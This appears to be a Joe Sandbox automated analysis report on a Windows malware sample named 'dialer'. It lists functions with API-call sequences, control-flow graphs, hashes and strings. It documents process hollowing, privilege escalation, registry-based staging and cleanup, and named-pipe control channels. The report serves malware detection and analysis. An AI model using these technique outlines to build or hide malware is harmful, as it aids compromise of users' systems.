                                                                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                          Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                          • String ID: M$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2203880229-3489460547
                                                                          • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                          • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                          Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 2071455217-3440882674
                                                                          • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                          • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                          Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                          • String ID:
                                                                          • API String ID: 3197395349-0
                                                                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                          Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 SleepEx 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                          • String ID:
                                                                          • API String ID: 3676546796-0
                                                                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                          Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                            • Part of subcall function 00000001400014D8: FindCloseChangeNotification.KERNELBASE ref: 000000014000161D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                            • Part of subcall function 00000001400014D8: RtlDeleteBoundaryDescriptor.NTDLL ref: 000000014000163D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                            • Part of subcall function 00000001400014D8: RtlRestoreThreadPreferredUILanguages.NTDLL ref: 0000000140001651
                                                                          • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                          • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                                          • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Heap$AllocCloseEnumOpen$AllocateBoundaryChangeDeleteDescriptorFindHandleLanguagesMemoryModulesNotificationPreferredProcessesReadRestoreTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 3158079169-0
                                                                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                          Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb FindCloseChangeNotification 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ChangeCloseFindNotificationOpenWow64
                                                                          • String ID:
                                                                          • API String ID: 3805842350-0
                                                                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                          Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                                          APIs
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                            • Part of subcall function 000000014000226C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                            • Part of subcall function 000000014000226C: FindResourceA.KERNEL32 ref: 000000014000232F
                                                                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                            • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                            • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                          • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Resource$Security$CurrentDescriptorFindOpenToken$AdjustChangeCloseConvertCreateErrorExitFreeLastLoadLocalLockLookupNotificationPrivilegePrivilegesSizeofStringValue
                                                                          • String ID:
                                                                          • API String ID: 2373407002-0
                                                                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                          Non-executed Functions

                                                                          Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Open$File$CloseExitFindHeapName$AllocChangeDeleteEnumHandleInformationModuleNotificationPathProcessesQueryReadTokenValueWow64lstrlen
                                                                          • String ID: SOFTWARE$dialerstager$open
                                                                          • API String ID: 4281403370-3931493855
                                                                          • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                          • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                          Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                          • String ID: @
                                                                          • API String ID: 3462610200-2766056989
                                                                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                          Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                          • String ID: dialersvc64
                                                                          • API String ID: 4184240511-3881820561
                                                                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                          Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Delete$CloseEnumOpen
                                                                          • String ID: SOFTWARE\dialerconfig
                                                                          • API String ID: 3013565938-461861421
                                                                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                          Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$Write$CloseCreateHandle
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 148219782-3440882674
                                                                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                          Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000002C.00000002.3586209140.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 0000002C.00000002.3585783468.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586595451.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 0000002C.00000002.3586902461.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_44_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: ntdll.dll
                                                                          • API String ID: 1646373207-2227199552
                                                                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                          Callgraph

                                                                          • Executed
                                                                          • Not Executed
                                                                          • Opacity -> Relevance
                                                                          • Disassembly available
